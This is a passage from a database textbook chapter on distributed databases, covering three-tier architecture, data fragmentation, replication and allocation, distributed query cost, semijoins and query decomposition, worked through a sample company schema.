Larson, “Federated Database Systems
for Managing Distributed,
Heterogeneous, and Autonomous
Databases.” ACM Computing Surveys
(Vol. 22: No. 3, September 1990).

conceptual schema (full database definition) of a component database, and the
component schema is derived by translating the local schema into a canonical data
model or common data model (CDM) for the FDBS. Schema translation from the
local schema to the component schema is accompanied by generating mappings to
transform commands on a component schema into commands on the corres-
ponding local schema. The export schema represents the subset of a component
schema that is available to the FDBS. The federated schema is the global schema or
view, which is the result of integrating all the shareable export schemas. The
external schemas define the schema for a user group or an application, as in the
three-level schema architecture.5

All the problems related to query processing, transaction processing, and directory
and metadata management and recovery apply to FDBSs with additional considera-
tions. It is not within our scope to discuss them in detail here.

5For a detailed discussion of the autonomies and the five-level architecture of FDBMSs, see Sheth and
Larson (1990).

891

Distributed Databases

Client
User interface or presentation tier

(Web browser, HTML, JavaScript, Visual Basic, . . .)

HTTP Protocol

Application server
Application (business) logic tier

(Application program, JAVA, C/C++, C#, . . .)

Database server
Query and transaction processing tier

(Database access, SQL, PSM, XML, . . .)

ODBC, JDBC, SQL/CLI, SQLJ

Figure 7
The three-tier
client-server
architecture.

3.4 An Overview of Three-Tier Client-Server Architecture
As we pointed out in the chapter introduction, full-scale DDBMSs have not been
developed to support all the types of functionalities. Instead, distributed database
applications are being developed in the context of the client-server architectures.
There is the two-tier client-server architecture, but it is now more common to use a
three-tier architecture, particularly in Web applications. This architecture is illus-
trated in Figure 7.

In the three-tier client-server architecture, the following three layers exist:

1. Presentation layer (client). This provides the user interface and interacts
with the user. The programs at this layer present Web interfaces or forms to
the client in order to interface with the application. Web browsers are often
utilized, and the languages and specifications used include HTML, XHTML,
CSS, Flash, MathML, Scalable Vector Graphics (SVG), Java, JavaScript,
Adobe Flex, and others. This layer handles user input, output, and naviga-
tion by accepting user commands and displaying the needed information,
usually in the form of static or dynamic Web pages. The latter are employed
when the interaction involves database access. When a Web interface is used,
this layer typically communicates with the application layer via the HTTP
protocol.

2. Application layer (business logic). This layer programs the application
logic. For example, queries can be formulated based on user input from the
client, or query results can be formatted and sent to the client for presenta-
tion. Additional application functionality can be handled at this layer, such

892

Distributed Databases

as security checks, identity verification, and other functions. The application
layer can interact with one or more databases or data sources as needed by
connecting to the database using ODBC, JDBC, SQL/CLI, or other database
access techniques.

3. Database server. This layer handles query and update requests from the
application layer, processes the requests, and sends the results. Usually SQL is
used to access the database if it is relational or object-relational and stored
database procedures may also be invoked. Query results (and queries) may
be formatted into XML when transmitted between the application server
and the database server.

Exactly how to divide the DBMS functionality between the client, application
server, and database server may vary. The common approach is to include the func-
tionality of a centralized DBMS at the database server level. A number of relational
DBMS products have taken this approach, where an SQL server is provided. The
application server must then formulate the appropriate SQL queries and connect to
the database server when needed. The client provides the processing for user inter-
face interactions. Since SQL is a relational standard, various SQL servers, possibly
provided by different vendors, can accept SQL commands through standards such
as ODBC, JDBC, and SQL/CLI.

In this architecture, the application server may also refer to a data dictionary that
includes information on the distribution of data among the various SQL servers, as
well as modules for decomposing a global query into a number of local queries that
can be executed at the various sites. Interaction between an application server and
database server might proceed as follows during the processing of an SQL query:

1. The application server formulates a user query based on input from the
client layer and decomposes it into a number of independent site queries.
Each site query is sent to the appropriate database server site.

2. Each database server processes the local query and sends the results to the
application server site. Increasingly, XML is being touted as the standard for
data exchange, so the database server may format the query result into XML
before sending it to the application server.

3. The application server combines the results of the subqueries to produce the
result of the originally required query, formats it into HTML or some other
form accepted by the client, and sends it to the client site for display.

The application server is responsible for generating a distributed execution plan for
a multisite query or transaction and for supervising distributed execution by send-
ing commands to servers. These commands include local queries and transactions
to be executed, as well as commands to transmit data to other clients or servers.
Another function controlled by the application server (or coordinator) is that of
ensuring consistency of replicated copies of a data item by employing distributed
(or global) concurrency control techniques. The application server must also ensure
the atomicity of global transactions by performing global recovery when certain
sites fail.

893

Distributed Databases

If the DDBMS has the capability to hide the details of data distribution from the
application server, then it enables the application server to execute global queries
and transactions as though the database were centralized, without having to specify
the sites at which the data referenced in the query or transaction resides. This prop-
erty is called distribution transparency. Some DDBMSs do not provide distribu-
tion transparency, instead requiring that applications are aware of the details of data
distribution.

4 Data Fragmentation, Replication,
and Allocation Techniques for Distributed
Database Design

In this section we discuss techniques that are used to break up the database into log-
ical units, called fragments, which may be assigned for storage at the various sites.
We also discuss the use of data replication, which permits certain data to be stored
in more than one site, and the process of allocating fragments—or replicas of frag-
ments—for storage at the various sites. These techniques are used during the
process of distributed database design. The information concerning data fragmen-
tation, allocation, and replication is stored in a global directory that is accessed by
the DDBS applications as needed.

4.1 Data Fragmentation
In a DDB, decisions must be made regarding which site should be used to store
which portions of the database. For now, we will assume that there is no replication;
that is, each relation—or portion of a relation—is stored at one site only. We discuss
replication and its effects later in this section. We also use the terminology of rela-
tional databases, but similar concepts apply to other data models. We assume that
we are starting with a relational database schema and must decide on how to dis-
tribute the relations over the various sites. To illustrate our discussion, we use the
relational database schema in Figure A.1.

Before we decide on how to distribute the data, we must determine the logical units
of the database that are to be distributed. The simplest logical units are the relations
themselves; that is, each whole relation is to be stored at a particular site. In our
example, we must decide on a site to store each of the relations EMPLOYEE,
DEPARTMENT, PROJECT, WORKS_ON, and DEPENDENT in Figure A.1. In many
cases, however, a relation can be divided into smaller logical units for distribution.
For example, consider the company database shown in Figure A.2, and assume there
are three computer sites—one for each department in the company.6

We may want to store the database information relating to each department at the
computer site for that department. A technique called horizontal fragmentation can
be used to partition each relation by department.

6Of course, in an actual situation, there will be many more tuples in the relation than those shown in
Figure A.2.

894

Distributed Databases

Horizontal Fragmentation. A horizontal fragment of a relation is a subset of
the tuples in that relation. The tuples that belong to the horizontal fragment are
specified by a condition on one or more attributes of the relation. Often, only a sin-
gle attribute is involved. For example, we may define three horizontal fragments on
the EMPLOYEE relation in Figure A.2 with the following conditions: (Dno = 5),
(Dno = 4), and (Dno = 1)—each fragment contains the EMPLOYEE tuples working
for a particular department. Similarly, we may define three horizontal fragments
for the PROJECT relation, with the conditions (Dnum = 5), (Dnum = 4), and
(Dnum = 1)—each fragment contains the PROJECT tuples controlled by a particu-
lar department. Horizontal fragmentation divides a relation horizontally by
grouping rows to create subsets of tuples, where each subset has a certain logical
meaning. These fragments can then be assigned to different sites in the distributed
system. Derived horizontal fragmentation applies the partitioning of a primary
relation (DEPARTMENT in our example) to other secondary relations (EMPLOYEE
and PROJECT in our example), which are related to the primary via a foreign key.
This way, related data between the primary and the secondary relations gets frag-
mented in the same way.

Vertical Fragmentation. Each site may not need all the attributes of a relation,
which would indicate the need for a different type of fragmentation. Vertical frag-
mentation divides a relation “vertically” by columns. A vertical fragment of a rela-
tion keeps only certain attributes of the relation. For example, we may want to
fragment the EMPLOYEE relation into two vertical fragments. The first fragment
includes personal information—Name, Bdate, Address, and Sex—and the second
includes work-related information—Ssn, Salary, Super_ssn, and Dno. This vertical
fragmentation is not quite proper, because if the two fragments are stored sepa-
rately, we cannot put the original employee tuples back together, since there is no
common attribute between the two fragments. It is necessary to include the primary
key or some candidate key attribute in every vertical fragment so that the full rela-
tion can be reconstructed from the fragments. Hence, we must add the Ssn attribute
to the personal information fragment.

Notice that each horizontal fragment on a relation R can be specified in the rela-
tional algebra by a σCi

(R) operation. A set of horizontal fragments whose conditions
C1, C2, …, Cn include all the tuples in R—that is, every tuple in R satisfies (C1 OR C2
OR … OR Cn)—is called a complete horizontal fragmentation of R. In many cases
a complete horizontal fragmentation is also disjoint; that is, no tuple in R satisfies
(Ci AND Cj) for any i ≠ j. Our two earlier examples of horizontal fragmentation for
the EMPLOYEE and PROJECT relations were both complete and disjoint. To recon-
struct the relation R from a complete horizontal fragmentation, we need to apply the
UNION operation to the fragments.

A vertical fragment on a relation R can be specified by a πLi
(R) operation in the rela-

tional algebra. A set of vertical fragments whose projection lists L1, L2, …, Ln include
all the attributes in R but share only the primary key attribute of R is called a

895

Distributed Databases

complete vertical fragmentation of R. In this case the projection lists satisfy the fol-
lowing two conditions:

■ L1 ∪ L2 ∪ … ∪ Ln = ATTRS(R).
■ Li ∩ Lj = PK(R) for any i ≠ j, where ATTRS(R) is the set of attributes of R and

PK(R) is the primary key of R.

To reconstruct the relation R from a complete vertical fragmentation, we apply the
OUTER UNION operation to the vertical fragments (assuming no horizontal frag-
mentation is used). Notice that we could also apply a FULL OUTER JOIN operation
and get the same result for a complete vertical fragmentation, even when some hor-
izontal fragmentation may also have been applied. The two vertical fragments of the
EMPLOYEE relation with projection lists L1 = {Ssn, Name, Bdate, Address, Sex} and
L2 = {Ssn, Salary, Super_ssn, Dno} constitute a complete vertical fragmentation of
EMPLOYEE.

Two horizontal fragments that are neither complete nor disjoint are those defined
on the EMPLOYEE relation in Figure A.1 by the conditions (Salary > 50000) and
(Dno = 4); they may not include all EMPLOYEE tuples, and they may include com-
mon tuples. Two vertical fragments that are not complete are those defined by the
attribute lists L1 = {Name, Address} and L2 = {Ssn, Name, Salary}; these lists violate
both conditions of a complete vertical fragmentation.

Mixed (Hybrid) Fragmentation. We can intermix the two types of fragmenta-
tion, yielding a mixed fragmentation. For example, we may combine the horizon-
tal and vertical fragmentations of the EMPLOYEE relation given earlier into a
mixed fragmentation that includes six fragments. In this case, the original relation
can be reconstructed by applying UNION and OUTER UNION (or OUTER JOIN)
operations in the appropriate order. In general, a fragment of a relation R can be
specified by a SELECT-PROJECT combination of operations πL(σC(R)). If
C = TRUE (that is, all tuples are selected) and L ≠ ATTRS(R), we get a vertical frag-
ment, and if C ≠ TRUE and L = ATTRS(R), we get a horizontal fragment. Finally, if
C ≠ TRUE and L ≠ ATTRS(R), we get a mixed fragment. Notice that a relation can
itself be considered a fragment with C = TRUE and L = ATTRS(R). In the following
discussion, the term fragment is used to refer to a relation or to any of the preced-
ing types of fragments.

A fragmentation schema of a database is a definition of a set of fragments that
includes all attributes and tuples in the database and satisfies the condition that the
whole database can be reconstructed from the fragments by applying some
sequence of OUTER UNION (or OUTER JOIN) and UNION operations. It is also
sometimes useful—although not necessary—to have all the fragments be disjoint
except for the repetition of primary keys among vertical (or mixed) fragments. In
the latter case, all replication and distribution of fragments is clearly specified at a
subsequent stage, separately from fragmentation.

An allocation schema describes the allocation of fragments to sites of the DDBS;
hence, it is a mapping that specifies for each fragment the site(s) at which it is

896

Distributed Databases

stored. If a fragment is stored at more than one site, it is said to be replicated. We
discuss data replication and allocation next.

4.2 Data Replication and Allocation
Replication is useful in improving the availability of data. The most extreme case is
replication of the whole database at every site in the distributed system, thus creating a
fully replicated distributed database. This can improve availability remarkably
because the system can continue to operate as long as at least one site is up. It also
improves performance of retrieval for global queries because the results of such
queries can be obtained locally from any one site; hence, a retrieval query can be
processed at the local site where it is submitted, if that site includes a server module.
The disadvantage of full replication is that it can slow down update operations drasti-
cally, since a single logical update must be performed on every copy of the database to
keep the copies consistent. This is especially true if many copies of the database exist.
Full replication makes the concurrency control and recovery techniques more expen-
sive than they would be if there was no replication, as we will see in Section 7.

The other extreme from full replication involves having no replication—that is,
each fragment is stored at exactly one site. In this case, all fragments must be dis-
joint, except for the repetition of primary keys among vertical (or mixed) frag-
ments. This is also called nonredundant allocation.

Between these two extremes, we have a wide spectrum of partial replication of the
data—that is, some fragments of the database may be replicated whereas others may
not. The number of copies of each fragment can range from one up to the total num-
ber of sites in the distributed system. A special case of partial replication is occurring
heavily in applications where mobile workers—such as sales forces, financial plan-
ners, and claims adjustors—carry partially replicated databases with them on laptops
and PDAs and synchronize them periodically with the server database.7 A descrip-
tion of the replication of fragments is sometimes called a replication schema.

Each fragment—or each copy of a fragment—must be assigned to a particular site
in the distributed system. This process is called data distribution (or data alloca-
tion). The choice of sites and the degree of replication depend on the performance
and availability goals of the system and on the types and frequencies of transactions
submitted at each site. For example, if high availability is required, transactions can
be submitted at any site, and most transactions are retrieval only, a fully replicated
database is a good choice. However, if certain transactions that access particular
parts of the database are mostly submitted at a particular site, the corresponding set
of fragments can be allocated at that site only. Data that is accessed at multiple sites
can be replicated at those sites. If many updates are performed, it may be useful to
limit replication. Finding an optimal or even a good solution to distributed data
allocation is a complex optimization problem.

7For a proposed scalable approach to synchronize partially replicated databases, see Mahajan et al.
(1998).

897

Distributed Databases

4.3 Example of Fragmentation, Allocation, and Replication
We now consider an example of fragmenting and distributing the company data-
base in Figures A.1 and A.2. Suppose that the company has three computer sites—
one for each current department. Sites 2 and 3 are for departments 5 and 4,
respectively. At each of these sites, we expect frequent access to the EMPLOYEE and
PROJECT information for the employees who work in that department and the proj-
ects controlled by that department. Further, we assume that these sites mainly access
the Name, Ssn, Salary, and Super_ssn attributes of EMPLOYEE. Site 1 is used by com-
pany headquarters and accesses all employee and project information regularly, in
addition to keeping track of DEPENDENT information for insurance purposes.

According to these requirements, the whole database in Figure A.2 can be stored at
site 1. To determine the fragments to be replicated at sites 2 and 3, first we can hori-
zontally fragment DEPARTMENT by its key Dnumber. Then we apply derived frag-
mentation to the EMPLOYEE, PROJECT, and DEPT_LOCATIONS relations based on
their foreign keys for department number—called Dno, Dnum, and Dnumber, respec-
tively, in Figure A.1. We can vertically fragment the resulting EMPLOYEE fragments
to include only the attributes {Name, Ssn, Salary, Super_ssn, Dno}. Figure 8 shows the
mixed fragments EMPD_5 and EMPD_4, which include the EMPLOYEE tuples satis-
fying the conditions Dno = 5 and Dno = 4, respectively. The horizontal fragments of
PROJECT, DEPARTMENT, and DEPT_LOCATIONS are similarly fragmented by
department number. All these fragments—stored at sites 2 and 3—are replicated
because they are also stored at headquarters—site 1.

We must now fragment the WORKS_ON relation and decide which fragments of
WORKS_ON to store at sites 2 and 3. We are confronted with the problem that no
attribute of WORKS_ON directly indicates the department to which each tuple
belongs. In fact, each tuple in WORKS_ON relates an employee e to a project P. We
could fragment WORKS_ON based on the department D in which e works or based
on the department D� that controls P. Fragmentation becomes easy if we have a con-
straint stating that D = D� for all WORKS_ON tuples—that is, if employees can work
only on projects controlled by the department they work for. However, there is no
such constraint in our database in Figure A.2. For example, the WORKS_ON tuple
<333445555, 10, 10.0> relates an employee who works for department 5 with a
project controlled by department 4. In this case, we could fragment WORKS_ON
based on the department in which the employee works (which is expressed by the
condition C) and then fragment further based on the department that controls the
projects that employee is working on, as shown in Figure 9.

In Figure 9, the union of fragments G1, G2, and G3 gives all WORKS_ON tuples for
employees who work for department 5. Similarly, the union of fragments G4, G5,
and G6 gives all WORKS_ON tuples for employees who work for department 4. On
the other hand, the union of fragments G1, G4, and G7 gives all WORKS_ON tuples
for projects controlled by department 5. The condition for each of the fragments G1
through G9 is shown in Figure 9 The relations that represent M:N relationships,
such as WORKS_ON, often have several possible logical fragmentations. In our dis-
tribution in Figure 8, we choose to include all fragments that can be joined to either

898

Distributed Databases

(a)

(b)

Fname

John B Smith 123456789 30000 333445555 5

Franklin T Wong 333445555 40000 888665555 5

K Narayan 666884444 38000 333445555 5

A English 453453453 25000 333445555 5

Ramesh

Joyce

EMPD_5

Minit Lname Ssn Salary Super_ssn Dno

Data at site 2

Data at site 3

Fname

Alicia J Zelaya 999887777 25000 987654321 4

Jennifer S Wallace 987654321 43000 888665555 4

V Jabbar 987987987 25000 987654321 4Ahmad

EMPD_4

Minit Lname Ssn Salary Super_ssn Dno

Dname

Research 5 333445555 1988-05-22

DEP_5

Dnumber Mgr_ssn Mgr_start_date Dnumber

5 Bellaire

5 Sugarland

5 Houston

DEP_5_LOCS

Location

Dname

Administration 4 987654321 1995-01-01

DEP_4

Dnumber Mgr_ssn Mgr_start_date

Essn

123456789 1

123456789 2

666884444

453453453

453453453

333445555

333445555

333445555

333445555

1

2

2

3

10

20

3

32.5

7.5

20.0

20.0

10.0

10.0

10.0

10.0

40.0

WORKS_ON_5

Pno Hours Pname

Product X 1

Product Y 2

Product Z 3

Bellaire

Sugarland

Houston

PROJS_5

Pnumber Plocation

5

5

5

Dnum

Essn

333445555 10

999887777 30

999887777

987987987

987987987

987654321

987654321

10

30

30

20

10

10.0

30.0

35.0

5.0

20.0

15.0

10.0

WORKS_ON_4

Pno Hours Pname

Computerization 10

New_benefits 30

Stafford

Stafford

PROJS_4

Pnumber Plocation

4

4

Dnum

Dnumber

4 Stafford

DEP_4_LOCS

Location

Figure 8
Allocation of fragments to
sites. (a) Relation fragments
at site 2 corresponding to
department 5. (b) Relation
fragments at site 3 corre-
sponding to department 4.

899

Distributed Databases

Essn

123456789 1 32.5

123456789 2 7.5

3 40.0

1 20.0

2 20.0

2 10.0

3 10.0

666884444

453453453

453453453

333445555

333445555

G1

1C = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 5))

Employees in Department 5

Pno Hours Essn

333445555 10 10.0

G2

C2 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 4))

Pno Hours Essn

333445555 20 10.0

G3

C3 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 1))

Pno Hours

Essn

G4

(b)

(c)

(a)

C4 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 5))

Employees in Department 4

Pno Hours Essn

999887777 30 30.0

999887777 10 10.0

987987987 10 35.0

987987987 30 5.0

987654321 30 20.0

G5

C5 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 4))

Pno Hours Essn

987654321 20 15.0

G6

C6 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 1))

Pno Hours

Essn

G7

C7 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 5))

Employees in Department 1

Pno Hours Essn

G8

C8 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 4))

Pno Hours Essn

888665555 20 Null

G9

C9 = C and (Pno in (SELECT
Pnumber FROM PROJECT
WHERE Dnum = 1))

Pno Hours

Figure 9
Complete and disjoint fragments of the WORKS_ON relation. (a) Fragments of WORKS_ON for employees
working in department 5 (C=[Essn in (SELECT Ssn FROM EMPLOYEE WHERE Dno=5)]). (b) Fragments of
WORKS_ON for employees working in department 4 (C=[Essn in (SELECT Ssn FROM EMPLOYEE WHERE
Dno=4)]). (c) Fragments of WORKS_ON for employees working in department 1 (C=[Essn in (SELECT Ssn
FROM EMPLOYEE WHERE Dno=1)]).

900

Distributed Databases

an EMPLOYEE tuple or a PROJECT tuple at sites 2 and 3. Hence, we place the union
of fragments G1, G2, G3, G4, and G7 at site 2 and the union of fragments G4, G5, G6,
G2, and G8 at site 3. Notice that fragments G2 and G4 are replicated at both sites.
This allocation strategy permits the join between the local EMPLOYEE or PROJECT
fragments at site 2 or site 3 and the local WORKS_ON fragment to be performed
completely locally. This clearly demonstrates how complex the problem of database
fragmentation and allocation is for large databases. The Selected Bibliography at the
end of this chapter discusses some of the work done in this area.

5 Query Processing and Optimization in
Distributed Databases

Now we give an overview of how a DDBMS processes and optimizes a query. First
we discuss the steps involved in query processing and then elaborate on the commu-
nication costs of processing a distributed query. Finally we discuss a special opera-
tion, called a semijoin, which is used to optimize some types of queries in a DDBMS.
A detailed discussion about optimization algorithms is beyond the scope of this
text. We attempt to illustrate optimization principles using suitable examples.8

5.1 Distributed Query Processing
A distributed database query is processed in stages as follows:

1. Query Mapping. The input query on distributed data is specified formally
using a query language. It is then translated into an algebraic query on global
relations. This translation is done by referring to the global conceptual
schema and does not take into account the actual distribution and replica-
tion of data. Hence, this translation is largely identical to the one performed
in a centralized DBMS. It is first normalized, analyzed for semantic errors,
simplified, and finally restructured into an algebraic query.

2. Localization. In a distributed database, fragmentation results in relations
being stored in separate sites, with some fragments possibly being replicated.
This stage maps the distributed query on the global schema to separate
queries on individual fragments using data distribution and replication
information.

3. Global Query Optimization. Optimization consists of selecting a strategy
from a list of candidates that is closest to optimal. A list of candidate queries
can be obtained by permuting the ordering of operations within a fragment
query generated by the previous stage. Time is the preferred unit for measur-
ing cost. The total cost is a weighted combination of costs such as CPU cost,
I/O costs, and communication costs. Since DDBs are connected by a net-
work, often the communication costs over the network are the most signifi-
cant. This is especially true when the sites are connected through a wide area
network (WAN).

8For a detailed discussion of optimization algorithms, see Ozsu and Valduriez (1999).

901

Distributed Databases

4. Local Query Optimization. This stage is common to all sites in the DDB.
The techniques are similar to those used in centralized systems.

The first three stages discussed above are performed at a central control site, while
the last stage is performed locally.

5.2 Data Transfer Costs of Distributed Query Processing
Besides the issues involved in processing and optimizing a query in a centralized
DBMS, in a distributed system, several additional factors further complicate query
processing. The first is the cost of transferring data over the network. This data
includes intermediate files that are transferred to other sites for further processing,
as well as the final result files that may have to be transferred to the site where the
query result is needed. Although these costs may not be very high if the sites are
connected via a high-performance local area network, they become quite significant
in other types of networks. Hence, DDBMS query optimization algorithms consider
the goal of reducing the amount of data transfer as an optimization criterion in
choosing a distributed query execution strategy.

We illustrate this with two simple sample queries. Suppose that the EMPLOYEE and
DEPARTMENT relations in Figure A.1 are distributed at two sites as shown in Figure
10. We will assume in this example that neither relation is fragmented. According to
Figure 10, the size of the EMPLOYEE relation is 100 * 10,000 = 10

6 bytes, and the size
of the DEPARTMENT relation is 35 * 100 = 3500 bytes. Consider the query Q: For
each employee, retrieve the employee name and the name of the department for which
the employee works. This can be stated as follows in the relational algebra:

Q: πFname,Lname,Dname(EMPLOYEE Dno=Dnumber DEPARTMENT)

The result of this query will include 10,000 records, assuming that every employee is
related to a department. Suppose that each record in the query result is 40 bytes long.

Fname

EMPLOYEE

Site 1:

10,000 records
each record is 100 bytes long
Ssn field is 9 bytes long
Dno field is 4 bytes long

Site 2:

Minit Lname Ssn Salary Super_ssn DnoBdate Address Sex

Dname

DEPARTMENT

Dnumber Mgr_ssn Mgr_start_date

Fname field is 15 bytes long
Lname field is 15 bytes long

100 records
each record is 35 bytes long
Dnumber field is 4 bytes long
Mgr_ssn field is 9 bytes long

Dname field is 10 bytes long

Figure 10
Example to illustrate
volume of data
transferred.

902

Distributed Databases

The query is submitted at a distinct site 3, which is called the result site because the
query result is needed there. Neither the EMPLOYEE nor the DEPARTMENT relations
reside at site 3. There are three simple strategies for executing this distributed query:

1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result
site, and perform the join at site 3. In this case, a total of 1,000,000 + 3,500 =
1,003,500 bytes must be transferred.

2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send
the result to site 3. The size of the query result is 40 * 10,000 = 400,000 bytes,
so 400,000 + 1,000,000 = 1,400,000 bytes must be transferred.

3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and
send the result to site 3. In this case, 400,000 + 3,500 = 403,500 bytes must be
transferred.

If minimizing the amount of data transfer is our optimization criterion, we should
choose strategy 3. Now consider another query Q�: For each department, retrieve the
department name and the name of the department manager. This can be stated as fol-
lows in the relational algebra:

Q�: πFname,Lname,Dname( DEPARTMENT Mgr_ssn=Ssn EMPLOYEE)

Again, suppose that the query is submitted at site 3. The same three strategies for
executing query Q apply to Q�, except that the result of Q� includes only 100 records,
assuming that each department has a manager:

1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result
site, and perform the join at site 3. In this case, a total of 1,000,000 + 3,500 =
1,003,500 bytes must be transferred.

2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send
the result to site 3. The size of the query result is 40 * 100 = 4,000 bytes, so
4,000 + 1,000,000 = 1,004,000 bytes must be transferred.

3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and
send the result to site 3. In this case, 4,000 + 3,500 = 7,500 bytes must be
transferred.

Again, we would choose strategy 3—this time by an overwhelming margin over
strategies 1 and 2. The preceding three strategies are the most obvious ones for the
case where the result site (site 3) is different from all the sites that contain files
involved in the query (sites 1 and 2). However, suppose that the result site is site 2;
then we have two simple strategies:

1. Transfer the EMPLOYEE relation to site 2, execute the query, and present the
result to the user at site 2. Here, the same number of bytes—1,000,000—
must be transferred for both Q and Q�.

2. Transfer the DEPARTMENT relation to site 1, execute the query at site 1, and
send the result back to site 2. In this case 400,000 + 3,500 = 403,500 bytes
must be transferred for Q and 4,000 + 3,500 = 7,500 bytes for Q�.

903

Distributed Databases

A more complex strategy, which sometimes works better than these simple strate-
gies, uses an operation called semijoin. We introduce this operation and discuss dis-
tributed execution using semijoins next.

5.3 Distributed Query Processing Using Semijoin
The idea behind distributed query processing using the semijoin operation is to
reduce the number of tuples in a relation before transferring it to another site.
Intuitively, the idea is to send the joining column of one relation R to the site where
the other relation S is located; this column is then joined with S. Following that, the
join attributes, along with the attributes required in the result, are projected out and
shipped back to the original site and joined with R. Hence, only the joining column
of R is transferred in one direction, and a subset of S with no extraneous tuples or
attributes is transferred in the other direction. If only a small fraction of the tuples
in S participate in the join, this can be quite an efficient solution to minimizing data
transfer.

To illustrate this, consider the following strategy for executing Q or Q�:

1. Project the join attributes of DEPARTMENT at site 2, and transfer them to site
1. For Q, we transfer F = πDnumber(DEPARTMENT), whose size is 4 * 100 = 400
bytes, whereas, for Q�, we transfer F� = πMgr_ssn(DEPARTMENT), whose size is
9 * 100 = 900 bytes.

2. Join the transferred file with the EMPLOYEE relation at site 1, and transfer
the required attributes from the resulting file to site 2. For Q, we transfer
R = πDno, Fname, Lname(F Dnumber=Dno EMPLOYEE), whose size is 34 * 10,000 =
340,000 bytes, whereas, for Q�, we transfer R� = πMgr_ssn, Fname, Lname
(F� Mgr_ssn=Ssn EMPLOYEE), whose size is 39 * 100 = 3,900 bytes.

3. Execute the query by joining the transferred file R or R� with DEPARTMENT,
and present the result to the user at site 2.

Using this strategy, we transfer 340,400 bytes for Q and 4,800 bytes for Q�. We lim-
ited the EMPLOYEE attributes and tuples transmitted to site 2 in step 2 to only those
that will actually be joined with a DEPARTMENT tuple in step 3. For query Q, this
turned out to include all EMPLOYEE tuples, so little improvement was achieved.
However, for Q� only 100 out of the 10,000 EMPLOYEE tuples were needed.

The semijoin operation was devised to formalize this strategy. A semijoin opera-
tion R A=B S, where A and B are domain-compatible attributes of R and S, respec-
tively, produces the same result as the relational algebra expression π

R
(R

A=B S). In
a distributed environment where R and S reside at different sites, the semijoin is
typically implemented by first transferring F = π

B
(S) to the site where R resides and

then joining F with R, thus leading to the strategy discussed here.

Notice that the semijoin operation is not commutative; that is,

R S ≠S R

904

Distributed Databases

5.4 Query and Update Decomposition
In a DDBMS with no distribution transparency, the user phrases a query directly in
terms of specific fragments. For example, consider another query Q: Retrieve the
names and hours per week for each employee who works on some project controlled by
department 5, which is specified on the distributed database where the relations at
sites 2 and 3 are shown in Figure 8, and those at site 1 are shown in Figure A.2, as in
our earlier example. A user who submits such a query must specify whether it refer-
ences the PROJS_5 and WORKS_ON_5 relations at site 2 (Figure 8) or the PROJECT
and WORKS_ON relations at site 1 (Figure A.2). The user must also maintain con-
sistency of replicated data items when updating a DDBMS with no replication trans-
parency.

On the other hand, a DDBMS that supports full distribution, fragmentation, and
replication transparency allows the user to specify a query or update request on the
schema in Figure A.1 just as though the DBMS were centralized. For updates, the
DDBMS is responsible for maintaining consistency among replicated items by using
one of the distributed concurrency control algorithms to be discussed in Section 7.
For queries, a query decomposition module must break up or decompose a query
into subqueries that can be executed at the individual sites. Additionally, a strategy
for combining the results of the subqueries to form the query result must be gener-
ated. Whenever the DDBMS determines that an item referenced in the query is repli-
cated, it must choose or materialize a particular replica during query execution.

To determine which replicas include the data items referenced in a query, the
DDBMS refers to the fragmentation, replication, and distribution information
stored in the DDBMS catalog. For vertical fragmentation, the attribute list for each
fragment is kept in the catalog. For horizontal fragmentation, a condition, some-
times called a guard, is kept for each fragment. This is basically a selection condition
that specifies which tuples exist in the fragment; it is called a guard because only
tuples that satisfy this condition are permitted to be stored in the fragment. For mixed
fragments, both the attribute list and the guard condition are kept in the catalog.

In our earlier example, the guard conditions for fragments at site 1 (Figure A.2) are
TRUE (all tuples), and the attribute lists are * (all attributes). For the fragments
shown in Figure 8, we have the guard conditions and attribute lists shown in Figure
11. When the DDBMS decomposes an update request, it can determine which frag-
ments must be updated by examining their guard conditions. For example, a user
request to insert a new EMPLOYEE tuple <‘Alex’, ‘B’, ‘Coleman’, ‘345671239’, ‘22- APR-64’, ‘3306 Sandstone, Houston, TX’, M, 33000, ‘987654321’, 4> would be
decomposed by the DDBMS into two insert requests: the first inserts the preceding
tuple in the EMPLOYEE fragment at site 1, and the second inserts the projected tuple
<‘Alex’, ‘B’, ‘Coleman’, ‘345671239’, 33000, ‘987654321’, 4> in the EMPD4 fragment at
site 3.

For query decomposition, the DDBMS can determine which fragments may
contain the required tuples by comparing the query condition with the guard

905

Distributed Databases

(a) EMPD5
attribute list: Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno

guard condition: Dno=5
DEP5

attribute list: * (all attributes Dname, Dnumber, Mgr_ssn, Mgr_start_date)
guard condition: Dnumber=5
DEP5_LOCS

attribute list: * (all attributes Dnumber, Location)
guard condition: Dnumber=5
PROJS5

attribute list: * (all attributes Pname, Pnumber, Plocation, Dnum)
guard condition: Dnum=5
WORKS_ON5

attribute list: * (all attributes Essn, Pno,Hours)
guard condition: Essn IN (πSsn (EMPD5)) OR Pno IN (πPnumber (PROJS5))

(b) EMPD4
attribute list: Fname, Minit, Lname, Ssn, Salary, Super_ssn, Dno

guard condition: Dno=4
DEP4

attribute list: * (all attributes Dname, Dnumber, Mgr_ssn, Mgr_start_date)
guard condition: Dnumber=4
DEP4_LOCS

attribute list: * (all attributes Dnumber, Location)
guard condition: Dnumber=4
PROJS4

attribute list: * (all attributes Pname, Pnumber, Plocation, Dnum)
guard condition: Dnum=4
WORKS_ON4

attribute list: * (all attributes Essn, Pno, Hours)
guard condition: Essn IN (πSsn (EMPD4))

OR Pno IN (πPnumber (PROJS4))

Figure 11
Guard conditions and attributes lists for fragments.
(a) Site 2 fragments. (b) Site 3 fragments.

conditions. For example, consider the query Q: Retrieve the names and hours per
week for each employee who works on some project controlled by department 5. This
can be specified in SQL on the schema in Figure A.1 as follows:

